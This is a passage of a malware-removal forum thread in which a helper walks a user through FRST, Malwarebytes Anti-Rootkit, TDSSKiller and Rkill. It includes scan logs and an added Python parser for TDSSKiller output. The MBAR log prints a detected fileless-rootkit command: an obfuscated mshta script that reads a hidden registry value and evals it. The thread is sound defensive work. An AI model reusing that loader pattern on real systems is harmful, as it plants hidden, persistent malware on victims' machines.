SearchScopes: HKLM -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM-x32 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKLM-x32 -> {22348997-7FD7-4759-AB9D-EB2B7A365617} URL = hxxp://www.bing.com/search?q={searchTerms}&FORM=HPNTDF&pc=HPNTDF&src=IE-SearchBox
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {0809851D-6B6B-49C8-93A3-D43B32E2A276} URL = hxxp://www.ask.com/web?q={searchterms}&l=dis&o=ushpl
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {171DEBEB-C3D4-40b7-AC73-056A5EBA4A7E} URL =
SearchScopes: HKU\S-1-5-21-3698744866-2675293530-421701469-1001 -> {18A0C804-F9DD-48B2-8E0A-5E0AFF2A73B0} URL = hxxp://search.avg.com/route/?d=4b3d2cf0&i=23&tp=chrome&q={searchTerms}&lng={language}&ychte=us&nt=1
Toolbar: HKLM-x32 - No Name - {CCC7A320-B3CA-4199-B1A6-9F516DD69829} - No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\system32\Adobe\Director\np32dsw.dll [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
FF Plugin ProgramFiles/Appdata: C:\Program Files (x86)\mozilla firefox\plugins\npMozCouponPrinter.dll [2009-11-19] (Coupons, Inc.)
CHR Extension: (Chrome Web Store Payments) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2016-07-07]
CHR Extension: (Chrome Media Router) - C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2016-11-22]
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
U4 eabfiltr; no ImagePath
S3 RtsUIR; system32\DRIVERS\Rts516xIR.sys [X]
S3 USBCCID; system32\DRIVERS\RtsUCcid.sys [X]
2017-04-08 13:45 - 2017-03-07 07:44 - 00000000 ____D C:\Users\KEKLR\AppData\Local\b3751cf7
2017-03-24 10:43 - 2017-03-08 07:27 - 00000000 ____D C:\Users\KEKLR\AppData\Local\fc867bd779
2016-07-27 23:59 - 2016-07-27 23:59 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{2836CA7E-F1C6-4205-9D7E-086B5750A033}
2011-06-16 22:33 - 2011-06-16 22:33 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\{7A9359AC-4F7B-4132-B15D-EABA459EF74D}
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{051B9612-4D82-42AC-8C63-CD2DCEDC1CB3}.log
2009-08-09 04:42 - 2009-08-09 04:43 - 0000109 _____ () C:\ProgramData\{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{23F3DA62-2D9E-4A69-B8D5-BE8E9E148092}.log
2009-08-09 04:36 - 2009-08-09 04:38 - 0000105 _____ () C:\ProgramData\{40BF1E83-20EB-11D8-97C5-0009C5020658}.log
2009-08-25 05:05 - 2009-08-25 05:05 - 0000032 _____ () C:\ProgramData\{4FC670EB-5F02-4B07-90DB-022B86BFEFD0}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000032 _____ () C:\ProgramData\{9867824A-C86D-4A83-8F3C-E7A86BE0AFD3}.log
2009-08-09 04:35 - 2009-08-09 04:35 - 0000107 _____ () C:\ProgramData\{C59C179C-668D-49A9-B6EA-0121CCFC1243}.log
2009-08-09 04:38 - 2009-08-09 04:42 - 0000110 _____ () C:\ProgramData\{CB099890-1D5F-11D5-9EA9-0050BAE317E1}.log
2009-08-25 05:06 - 2009-08-25 05:06 - 0000105 _____ () C:\ProgramData\{d36dd326-7280-11d8-97c8-000129760cbe}.log
ZeroAccess:
C:\Users\KEKLR\AppData\Local\{62c84f77-987b-450c-f5fd-00ddcaad417b}
2016-11-24 18:47 - 2016-11-24 18:47 - 0066048 _____ () C:\Users\KEKLR\AppData\Local\Temp\Execute2App.exe
2016-11-24 18:47 - 2014-05-07 17:43 - 0568832 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcp90.dll
2016-11-24 18:47 - 2014-05-07 17:43 - 0655872 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\msvcr90.dll
2016-11-23 11:51 - 2016-11-23 11:51 - 0490348 _____ () C:\Users\KEKLR\AppData\Local\Temp\sbwcrv.exe
2006-05-24 11:10 - 2006-05-24 11:10 - 0455600 ____R (Macrovision Corporation) C:\Users\KEKLR\AppData\Local\Temp\_is4F67.exe
C:\Windows\System32\igdumd32.dll
C:\Windows\System32\igdumdx32.dll
C:\Windows\System32\MFC71.DLL
C:\Windows\System32\MFC71U.DLL
C:\Windows\System32\MSVBVM60.DLL
C:\Windows\System32\MSVCP71.dll
C:\Windows\System32\MSVCR71.dll
C:\Windows\System32\olepro32.DLL
Task: {510B196C-5350-4298-B4D2-AF749C488825} - System32\Tasks\{6820B139-0AD1-4144-A3FD-E70E8C28103B} => pcalua.exe -a "C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe" -d C:\Users\KEKLR\Desktop
C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R89YO0IS\AdobeAIRInstaller[1].exe
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumdx32.dll
2013-08-10 20:58 - 2013-08-10 20:58 - 00000000 _____ () C:\Windows\system32\igdumd32.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCP71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MSVCR71.dll
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71.DLL
2013-08-10 20:59 - 2013-08-10 20:59 - 00000000 _____ () C:\Windows\system32\MFC71U.DLL
FirewallRules: [TCP Query User{59976019-56BF-4C07-8662-F6FA2CDDA46F}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
FirewallRules: [UDP Query User{563B2413-04C2-4711-817E-88F15DC9C6B4}C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe] => (Allow) C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca\enterprisedu.exe
C:\users\keklr\appdata\local\temp\7zs14ca
End

On the top menu of the Notepad document click on File and then on Save As. A new window will open.

In the Filename box type fixlist, then select Desktop and click the Save button.

Now go to the Desktop, right-click the FRST64 icon and select Run as administrator to start the tool.
Click the Fix button only once and wait.
When finished, FRST will generate a log on the Desktop named fixlog.txt. Please post its entire content in your next reply.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that, let the tool complete its run.

Then read the instructions in my previous post to download, install and perform the scans with Malwarebytes Anti-Rootkit and RogueKiller, and post the produced logs.

Please let me know if anything is unclear.

Thank you.

 




#11 Android 8888
SWI Malware Tracker (Helper, 865 posts)
Posted 09 April 2017 - 05:13 PM

Ooopss....

I did not notice that you had already replied. Please ignore my previous post.

Okay, I will wait for the logs of Malwarebytes Anti-Rootkit and RogueKiller.

Thank you.


Edited by Android 8888, 09 April 2017 - 05:22 PM.



#12 krtate
Advanced Member (Full Member, 170 posts)
Posted 09 April 2017 - 05:52 PM

Malwarebytes Anti-Rootkit BETA 1.9.3.1001
www.malwarebytes.org

Database version:
  main:    v2017.04.09.05
  rootkit: v2017.04.02.01

Windows 7 Service Pack 1 x64 NTFS
Internet Explorer 11.0.9600.18617
KEKLR :: KEKLR-PC [administrator]

4/9/2017 6:09:49 PM
mbar-log-2017-04-09 (18-09-49).txt

Scan type: Quick scan
Scan options enabled: Anti-Rootkit | Drivers | MBR | Physical Sectors | Memory | Startup | Registry | File System | Heuristics/Extra | Heuristics/Shuriken
Scan options disabled:
Objects scanned: 312272
Time elapsed: 33 minute(s), 9 second(s)

Memory Processes Detected: 0
(No malicious items detected)

Memory Modules Detected: 0
(No malicious items detected)

Registry Keys Detected: 1
HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\09500508\SHELL\OPEN\COMMAND (Rootkit.Fileless.MTGen) -> Delete on reboot. [5eab8f60575179bd3f53f47ffa078e72]

Registry Values Detected: 1
HKU\S-1-5-21-3698744866-2675293530-421701469-1001_Classes\09500508\SHELL\OPEN\COMMAND| (Rootkit.Fileless.MTGen) -> Data: mshta "about:<script>tRAs5G="HjKZ9";B4x=new ActiveXObject("WScript.Shell");pU8mN3="ra69lmc";Nn7wN2=B4x.RegRead("HKCU\\software\\qyhgeurf\\hfuzav");i7YHDY7="jo";eval(Nn7wN2);YfQ7U7="NNW";</script>" -> Delete on reboot. [5eab8f60575179bd3f53f47ffa078e72]

Registry Data Items Detected: 0
(No malicious items detected)

Folders Detected: 0
(No malicious items detected)

Files Detected: 0
(No malicious items detected)

Physical Sectors Detected: 0
(No malicious items detected)

(end)



#13 krtate
Advanced Member (Full Member, 170 posts)
Posted 09 April 2017 - 06:28 PM

I ran the last scan, RogueKiller. It closed itself; I don't see "Open Report".

Also, when I open Internet Explorer (after I ran the first scan of the three), I get a message that something is trying to change my homepage to something about Microsoft. It doesn't stay up long enough to get the exact link.

Added:

I closed the browser and opened it again; I'm not getting the warning now about changing my homepage.


Edited by krtate, 09 April 2017 - 06:47 PM.


#14 Android 8888
SWI Malware Tracker (Helper, 865 posts)
Posted 10 April 2017 - 02:51 PM

Hello krtate.

Thank you for the log and for keeping me informed.

Okay, please try the following tool to see if it finds any remnants of the rootkit.

  • Download TDSSKiller from BleepingComputer, then move the executable file to your Desktop;
  • Right-click on tdsskiller.exe and select Run as Administrator;
  • Accept the End User License Agreement (EULA) and the KSN Statement;
  • Once the application is done initializing, click on the Change parameters blue link;
  • In addition to the currently checked boxes, check these two as well:
    • Verify file digital signature;
    • Detect TDLFS file system;
  • Once done, click on OK, then click on Start scan;
  • After the scan is complete, click on the Report button in the top right corner;
  • A report window will open with the scan log. Copy and paste it in your next reply;

 

How is the computer running at this point?

 

Android 8888




#15 krtate
Advanced Member (Full Member, 170 posts)
Posted 10 April 2017 - 04:50 PM

I'm running TDSSKiller. It has a pop-up stating 2 unsigned files, LightScribeService and ose, and provides an option to skip, copy to quarantine or delete. It won't let me select Report until I do something with this pop-up.

I ran Malwarebytes again last night and the rootkit is still there. I don't think RogueKiller completed running.



#16 Android 8888
SWI Malware Tracker (Helper, 865 posts)
Posted 10 April 2017 - 05:24 PM

Just quarantine the files, do not delete them. Then post the log, please.

For RogueKiller, please try the following:

Please download Rkill by Grinler from one of these links:

Rkill.exe
Rkill.com
Rkill.scr

Save Rkill to your Desktop.
Right-click on the icon and choose Run as administrator to run the tool, and click Yes.

Note: If the first one does not run successfully, download and try the other copies (with different file extensions) and see if one of them will run.
When completed it will create a log. Please post its content in your next reply.

Important: DO NOT reboot your computer at this moment. If it does reboot, then please run the program again.

Once Rkill has successfully run, try to run RogueKiller again immediately.

Please post the TDSSKiller log and the RogueKiller log.

Thank you.

 

 




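The TDSSKiller log the helper asks for above is several hundred lines of hashed objects, each followed by a verdict, and the entries that matter (the two unsigned files the poster mentions, or anything not marked "- ok") are easy to miss by eye. The following is an added example for this thread, not Kaspersky's code and not the poster's log: a small Python parser for the log layout pasted later in the thread, where a "[ MD5, SHA256 ] name path" line is followed by a "name - verdict" line. The sample input copies two entries visible in the thread; the "Suspect" service and the "( UnsignedFile.Multi.Generic ) - warning" / "- detected ... (1)" verdict lines are constructed to show how a flagged object surfaces, and their exact shape is an assumption about TDSSKiller's log style rather than something taken from this page.

```python
"""Parse a TDSSKiller scan log and surface every object whose verdict is not "- ok".

Added example for this thread; not Kaspersky's code and not the poster's log.
Assumed layout (matches the services section pasted later in the thread):
    <hh:mm:ss.ffff> <thread id> [ MD5, SHA256 ] <name> <path>
    <hh:mm:ss.ffff> <thread id> <name> - <verdict>
The "( Tag ) - warning" / "- detected ... (1)" shapes for flagged objects are
an assumption about TDSSKiller's general log style, not taken from this page.
"""
from __future__ import annotations

import re
from dataclasses import dataclass, field
from typing import Optional

# Constructed sample: the 1394ohci and COMSysApp lines copy entries visible in
# the thread; the "Suspect" service and its verdict lines are invented.
SAMPLE_LOG = r"""
17:32:28.0342 0x1b50 ================ Scan services =============================
17:32:29.0784 0x1b50 [ A87D604AEA360176311474C87A63BB88, B1507868C382CD5D2DBC0D62114FCFBF7A780904A2E3CA7C7C1DD0844ADA9A8F ] 1394ohci C:\Windows\system32\drivers\1394ohci.sys
17:32:29.0926 0x1b50 1394ohci - ok
17:32:38.0232 0x1b50 COMSysApp - ok
17:32:44.0000 0x1b50 [ 0123456789ABCDEF0123456789ABCDEF, 0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF0123456789ABCDEF ] Suspect C:\Program Files\Example\Suspect.exe
17:32:44.0100 0x1b50 Suspect ( UnsignedFile.Multi.Generic ) - warning
17:32:44.0100 0x1b50 Suspect - detected UnsignedFile.Multi.Generic (1)
"""

# Every log line starts with a timestamp and a hex thread id.
LINE_RE = re.compile(r"^(\d{2}:\d{2}:\d{2}\.\d{4})\s+(0x[0-9A-Fa-f]+)\s+(?P<body>.*)$")
# "[ MD5, SHA256 ] name path": the object about to be judged.
HASH_RE = re.compile(r"^\[ (?P<md5>[0-9A-F]{32}), (?P<sha256>[0-9A-F]{64}) \] (?P<name>\S+) (?P<path>.+)$")
# "name - ok", "name ( Tag ) - warning", "name - detected Tag (1)": the verdict.
VERDICT_RE = re.compile(r"^(?P<name>\S+)(?: \( (?P<tag>[^)]+) \))? - (?P<verdict>.+)$")


@dataclass
class Entry:
    name: str
    path: Optional[str] = None
    md5: Optional[str] = None
    sha256: Optional[str] = None
    verdicts: list[str] = field(default_factory=list)

    @property
    def clean(self) -> bool:
        # Exactly one verdict and it is "ok"; a warning or detection line
        # anywhere for this object makes it worth a second look.
        return self.verdicts == ["ok"]


def parse_tdsskiller_log(text: str) -> list[Entry]:
    """Return scanned objects in log order, each with its hashes and verdict(s)."""
    entries: list[Entry] = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if not m:
            continue  # blank line or non-log text
        body = m.group("body")
        h = HASH_RE.match(body)
        if h:
            entries.append(Entry(h["name"], h["path"], h["md5"], h["sha256"]))
            continue
        v = VERDICT_RE.match(body)
        if not v:
            continue  # header, drive layout, "KSN ping" and similar lines
        # A verdict follows the hash line for the same name; COMSysApp-style
        # entries carry a verdict without any hashed file, so create one.
        target = next((e for e in reversed(entries) if e.name == v["name"]), None)
        if target is None:
            target = Entry(v["name"])
            entries.append(target)
        verdict = v["verdict"]
        if v["tag"]:
            verdict = f"{verdict} ({v['tag']})"
        target.verdicts.append(verdict)
    return entries


def suspicious(entries: list[Entry]) -> list[Entry]:
    """Objects with any verdict other than a single "ok"."""
    return [e for e in entries if not e.clean]


def unhashed(entries: list[Entry]) -> list[Entry]:
    """Objects that got a verdict but no hashed image file (nothing to look up)."""
    return [e for e in entries if e.sha256 is None]


def report(entries: list[Entry]) -> list[str]:
    """One line per flagged object: name, verdicts, path and SHA-256 for lookup."""
    return [
        f"{e.name}: {'; '.join(e.verdicts)} | {e.path or '<no file>'} | sha256={e.sha256 or '-'}"
        for e in suspicious(entries)
    ]


if __name__ == "__main__":
    parsed = parse_tdsskiller_log(SAMPLE_LOG)
    print(f"{len(parsed)} objects, {len(suspicious(parsed))} flagged, "
          f"{len(unhashed(parsed))} without a hashed file")
    for line in report(parsed):
        print(line)
```

Paste the real log into SAMPLE_LOG (or read it from a file) and the report lists only the objects that need a decision, with the SHA-256 next to each so it can be looked up before anything is deleted. An unsigned-file warning is a heuristic, not proof of infection, which is why the helper's advice above is to quarantine rather than delete; the parser keeps that distinction by recording the verdict text instead of collapsing everything to "bad".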
#17 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 10 April 2017 - 06:17 PM

17:31:42.0666 0x10a0 TDSS rootkit removing tool 3.1.0.12 Nov 7 2016 07:10:01

17:31:59.0290 0x10a0 ============================================================

17:31:59.0290 0x10a0 Current date / time: 2017/04/10 17:31:59.0290

17:31:59.0290 0x10a0 SystemInfo:

17:31:59.0290 0x10a0

17:31:59.0290 0x10a0 OS Version: 6.1.7601 ServicePack: 1.0

17:31:59.0290 0x10a0 Product type: Workstation

17:31:59.0290 0x10a0 ComputerName: KEKLR-PC

17:31:59.0290 0x10a0 UserName: KEKLR

17:31:59.0290 0x10a0 Windows directory: C:\Windows

17:31:59.0290 0x10a0 System windows directory: C:\Windows

17:31:59.0290 0x10a0 Running under WOW64

17:31:59.0290 0x10a0 Processor architecture: Intel x64

17:31:59.0290 0x10a0 Number of processors: 2

17:31:59.0290 0x10a0 Page size: 0x1000

17:31:59.0290 0x10a0 Boot type: Normal boot

17:31:59.0290 0x10a0 CodeIntegrityOptions = 0x00000001

17:31:59.0290 0x10a0 ============================================================

17:31:59.0890 0x10a0 KLMD registered as C:\Windows\system32\drivers\80139537.sys

17:31:59.0890 0x10a0 KLMD ARK init status: drvProperties = 0xFFF00, osBuild = 7601.23677, osProperties = 0x1

17:32:02.0686 0x10a0 System UUID: {672B5EF1-D76A-44C1-278D-9FEAABFAE7DA}

17:32:04.0569 0x10a0 Drive \Device\Harddisk0\DR0 - Size: 0x4A85D56000 ( 298.09 Gb ), SectorSize: 0x200, Cylinders: 0x9801, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040

17:32:04.0784 0x10a0 ============================================================

17:32:04.0784 0x10a0 \Device\Harddisk0\DR0:

17:32:04.0785 0x10a0 MBR partitions:

17:32:04.0785 0x10a0 \Device\Harddisk0\DR0\Partition1: MBR, Type 0x7, StartLBA 0x800, BlocksNum 0x63800

17:32:04.0785 0x10a0 \Device\Harddisk0\DR0\Partition2: MBR, Type 0x7, StartLBA 0x64000, BlocksNum 0x23A58800

17:32:04.0785 0x10a0 \Device\Harddisk0\DR0\Partition3: MBR, Type 0x7, StartLBA 0x23ABC800, BlocksNum 0x1971800

17:32:04.0785 0x10a0 ============================================================

17:32:04.0814 0x10a0 C: <-> \Device\Harddisk0\DR0\Partition2

17:32:04.0858 0x10a0 D: <-> \Device\Harddisk0\DR0\Partition3

17:32:04.0896 0x10a0 ============================================================

17:32:04.0896 0x10a0 Initialize success

17:32:04.0896 0x10a0 ============================================================

17:32:28.0342 0x1b50 ============================================================

17:32:28.0342 0x1b50 Scan started

17:32:28.0342 0x1b50 Mode: Manual; SigCheck; TDLFS;

17:32:28.0342 0x1b50 ============================================================

17:32:28.0342 0x1b50 KSN ping started

17:32:28.0512 0x1b50 KSN ping finished: true

17:32:29.0564 0x1b50 ================ Scan system memory ========================

17:32:29.0564 0x1b50 System memory - ok

17:32:29.0564 0x1b50 ================ Scan services =============================

17:32:29.0784 0x1b50 [ A87D604AEA360176311474C87A63BB88, B1507868C382CD5D2DBC0D62114FCFBF7A780904A2E3CA7C7C1DD0844ADA9A8F ] 1394ohci C:\Windows\system32\drivers\1394ohci.sys

17:32:29.0926 0x1b50 1394ohci - ok

17:32:29.0996 0x1b50 [ 5C368F4B04ED2A923E6AFCA2D37BAFF5, C3CC58D636B18DF77C4C4B384AD1DE78418716A0606E564DBC63782D5EA02905 ] Accelerometer C:\Windows\system32\DRIVERS\Accelerometer.sys

17:32:30.0086 0x1b50 Accelerometer - ok

17:32:30.0126 0x1b50 [ D81D9E70B8A6DD14D42D7B4EFA65D5F2, FDAAB7E23012B4D31537C5BDEF245BB0A12FA060A072C250E21C68E18B22E002 ] ACPI C:\Windows\system32\drivers\ACPI.sys

17:32:30.0146 0x1b50 ACPI - ok

17:32:30.0186 0x1b50 [ 99F8E788246D495CE3794D7E7821D2CA, F91615463270AD2601F882CAED43B88E7EDA115B9FD03FC56320E48119F15F76 ] AcpiPmi C:\Windows\system32\drivers\acpipmi.sys

17:32:30.0216 0x1b50 AcpiPmi - ok

17:32:30.0346 0x1b50 [ B932E0EE190778D840F1442DFC0F9612, 8780963F14D57279FDD585BE945ED40F24590D32676C7A9EF94002D38B8BA643 ] AdobeARMservice C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

17:32:30.0376 0x1b50 AdobeARMservice - ok

17:32:30.0516 0x1b50 [ 7EB7A3B01751889C6459C51A74CC87FA, 088EF5CA10D439905822A3DFFEFD2D3416198F10EAAF8C235771CDB3DF86E82C ] AdobeFlashPlayerUpdateSvc C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe

17:32:30.0556 0x1b50 AdobeFlashPlayerUpdateSvc - ok

17:32:30.0606 0x1b50 [ 2F6B34B83843F0C5118B63AC634F5BF4, 43E3F5FBFB5D33981AC503DEE476868EC029815D459E7C36C4ABC2D2F75B5735 ] adp94xx C:\Windows\system32\DRIVERS\adp94xx.sys

17:32:30.0636 0x1b50 adp94xx - ok

17:32:30.0676 0x1b50 [ 597F78224EE9224EA1A13D6350CED962, DA7FD99BE5E3B7B98605BF5C13BF3F1A286C0DE1240617570B46FE4605E59BDC ] adpahci C:\Windows\system32\DRIVERS\adpahci.sys

17:32:30.0696 0x1b50 adpahci - ok

17:32:30.0716 0x1b50 [ E109549C90F62FB570B9540C4B148E54, E804563735153EA00A00641814244BC8A347B578E7D63A16F43FB17566EE5559 ] adpu320 C:\Windows\system32\DRIVERS\adpu320.sys

17:32:30.0736 0x1b50 adpu320 - ok

17:32:30.0776 0x1b50 [ 262D7C87D0AC20B96EF9877D3CA478A0, 54F7E5A5F8991C5525500C1ECCF3D3135D13F48866C366E52DF1D052DB2EE15B ] AeLookupSvc C:\Windows\System32\aelupsvc.dll

17:32:30.0866 0x1b50 AeLookupSvc - ok

17:32:30.0966 0x1b50 [ A6FB9DB8F1A86861D955FD6975977AE0, 788C6EE50719227D7A9B7F08C8D5E1289FCD0E8AC23A1021A5093D2E8368F696 ] AESTFilters C:\Windows\System32\DriverStore\FileRepository\stwrt64.inf_amd64_neutral_960c1f056a541068\AESTSr64.exe

17:32:31.0066 0x1b50 AESTFilters - ok

17:32:31.0146 0x1b50 [ 9A4A1EEE802BF2F878EE8EAB407B21B7, 177EB7DF4B35FE4C0E45E775A0FD5D48D39B410052E3EE18BDEEC809E152D9D8 ] AFD C:\Windows\system32\drivers\afd.sys

17:32:31.0296 0x1b50 AFD - ok

17:32:31.0336 0x1b50 [ B65F8DBA54F251906BBE8611B5A0E7AB, 9ADE347CB4E7C33D668DAC79A316C97C78D94D296B158F481F3E32F9DA4D647E ] AgereModemAudio C:\Program Files\LSI SoftModem\agr64svc.exe

17:32:31.0506 0x1b50 AgereModemAudio - ok

17:32:31.0586 0x1b50 [ AF4748EF93416159459769A24A0053AF, AE1C4E67E7555066436112C5A090DC5B49B264E3BA3ECF4CE2F1E9B799089B7D ] AgereSoftModem C:\Windows\system32\DRIVERS\agrsm64.sys

17:32:31.0686 0x1b50 AgereSoftModem - ok

17:32:31.0746 0x1b50 [ 608C14DBA7299D8CB6ED035A68A15799, 45360F89640BF1127C82A32393BD76205E4FA067889C40C491602F370C09282A ] agp440 C:\Windows\system32\drivers\agp440.sys

17:32:31.0776 0x1b50 agp440 - ok

17:32:31.0816 0x1b50 [ 3290D6946B5E30E70414990574883DDB, 0E9294E1991572256B3CDA6B031DB9F39CA601385515EE59F1F601725B889663 ] ALG C:\Windows\System32\alg.exe

17:32:31.0856 0x1b50 ALG - ok

17:32:31.0916 0x1b50 [ 5812713A477A3AD7363C7438CA2EE038, A7316299470D2E57A11499C752A711BF4A71EB11C9CBA731ED0945FF6A966721 ] aliide C:\Windows\system32\drivers\aliide.sys

17:32:31.0936 0x1b50 aliide - ok

17:32:31.0976 0x1b50 [ 1FF8B4431C353CE385C875F194924C0C, 3EA3A7F426B0FFC2461EDF4FDB4B58ACC9D0730EDA5B728D1EA1346EA0A02720 ] amdide C:\Windows\system32\drivers\amdide.sys

17:32:32.0006 0x1b50 amdide - ok

17:32:32.0036 0x1b50 [ 7024F087CFF1833A806193EF9D22CDA9, E7F27E488C38338388103D3B7EEDD61D05E14FB140992AEE6F492FFC821BF529 ] AmdK8 C:\Windows\system32\DRIVERS\amdk8.sys

17:32:32.0076 0x1b50 AmdK8 - ok

17:32:32.0116 0x1b50 [ 1E56388B3FE0D031C44144EB8C4D6217, E88CA76FD47BA0EB427D59CB9BE040DE133D89D4E62D03A8D622624531D27487 ] AmdPPM C:\Windows\system32\DRIVERS\amdppm.sys

17:32:32.0136 0x1b50 AmdPPM - ok

17:32:32.0166 0x1b50 [ D4121AE6D0C0E7E13AA221AA57EF2D49, 626F43C099BD197BE56648C367B711143C2BCCE96496BBDEF19F391D52FA01D0 ] amdsata C:\Windows\system32\drivers\amdsata.sys

17:32:32.0186 0x1b50 amdsata - ok

17:32:32.0226 0x1b50 [ F67F933E79241ED32FF46A4F29B5120B, D6EF539058F159CC4DD14CA9B1FD924998FEAC9D325C823C7A2DD21FEF1DC1A8 ] amdsbs C:\Windows\system32\DRIVERS\amdsbs.sys

17:32:32.0236 0x1b50 amdsbs - ok

17:32:32.0276 0x1b50 [ 540DAF1CEA6094886D72126FD7C33048, 296578572A93F5B74E1AD443E000B79DC99D1CBD25082E02704800F886A3065F ] amdxata C:\Windows\system32\drivers\amdxata.sys

17:32:32.0296 0x1b50 amdxata - ok

17:32:32.0346 0x1b50 [ B84DDCCB03A9CEDC1E90A88EDA5306DB, 1E51A7336C7E3F6402ED90AB0B3E98FD3827E2DC51B133E7F8BB37140B315192 ] AppID C:\Windows\system32\drivers\appid.sys

17:32:32.0446 0x1b50 AppID - ok

17:32:32.0456 0x1b50 [ 02B60F8FA4BAB8DC3B14782A7E60564B, D7EB27CB202573734D7A4EB4667B9BCEC1598AA9EBD154F2C9266AF230F51A52 ] AppIDSvc C:\Windows\System32\appidsvc.dll

17:32:32.0526 0x1b50 AppIDSvc - ok

17:32:32.0556 0x1b50 [ DE23E052E557580674785CDF45B613F3, A955ADC6CC7D816BA7CE1065F911E7A3295A1908C22BE0A3C506C38CFEE8DE0D ] Appinfo C:\Windows\System32\appinfo.dll

17:32:32.0606 0x1b50 Appinfo - ok

17:32:32.0636 0x1b50 [ C484F8CEB1717C540242531DB7845C4E, C507CE26716EB923B864ED85E8FA0B24591E2784A2F4F0E78AEED7E9953311F6 ] arc C:\Windows\system32\DRIVERS\arc.sys

17:32:32.0656 0x1b50 arc - ok

17:32:32.0666 0x1b50 [ 019AF6924AEFE7839F61C830227FE79C, 5926B9DDFC9198043CDD6EA0B384C83B001EC225A8125628C4A45A3E6C42C72A ] arcsas C:\Windows\system32\DRIVERS\arcsas.sys

17:32:32.0686 0x1b50 arcsas - ok

17:32:32.0816 0x1b50 [ EE424A5CE56E3923D59BB7DE2E15036D, 8B8196870EFE74D43EDA72674021A46846D370E97A6A058134D84A721AECD091 ] aspnet_state C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_state.exe

17:32:32.0876 0x1b50 aspnet_state - ok

17:32:32.0926 0x1b50 [ 769765CE2CC62867468CEA93969B2242, 0D8F19D49869DF93A3876B4C2E249D12E83F9CE11DAE8917D368E292043D4D26 ] AsyncMac C:\Windows\system32\DRIVERS\asyncmac.sys

17:32:33.0136 0x1b50 AsyncMac - ok

17:32:33.0186 0x1b50 [ 02062C0B390B7729EDC9E69C680A6F3C, 0261683C6DC2706DCE491A1CDC954AC9C9E649376EC30760BB4E225E18DC5273 ] atapi C:\Windows\system32\drivers\atapi.sys

17:32:33.0196 0x1b50 atapi - ok

17:32:33.0426 0x1b50 [ 3EFD964D52221360AF0673CD61C2F4F5, 76D636CAF2E4FEDAAC6B0D958865A901340CF836EE4FCE59F1D5291E3BEC9F1E ] atikmdag C:\Windows\system32\drivers\atikmdag.sys

17:32:33.0616 0x1b50 atikmdag - ok

17:32:33.0696 0x1b50 [ 67C717EC24FCAAE7B518D9E06AD036AB, F08550E4FCEC2899FACEF2A18CEE3D068D5911FFD2FF5534E4921E56FB0AEF59 ] AudioEndpointBuilder C:\Windows\System32\Audiosrv.dll

17:32:33.0746 0x1b50 AudioEndpointBuilder - ok

17:32:33.0766 0x1b50 [ 67C717EC24FCAAE7B518D9E06AD036AB, F08550E4FCEC2899FACEF2A18CEE3D068D5911FFD2FF5534E4921E56FB0AEF59 ] AudioSrv C:\Windows\System32\Audiosrv.dll

17:32:33.0796 0x1b50 AudioSrv - ok

17:32:33.0856 0x1b50 [ A6BF31A71B409DFA8CAC83159E1E2AFF, CBB83F73FFD3C3FB4F96605067739F8F7A4A40B2B05417FA49E575E95628753F ] AxInstSV C:\Windows\System32\AxInstSV.dll

17:32:33.0996 0x1b50 AxInstSV - ok

17:32:34.0046 0x1b50 [ 3E5B191307609F7514148C6832BB0842, DE011CB7AA4A2405FAF21575182E0793A1D83DFFC44E9A7864D59F3D51D8D580 ] b06bdrv C:\Windows\system32\DRIVERS\bxvbda.sys

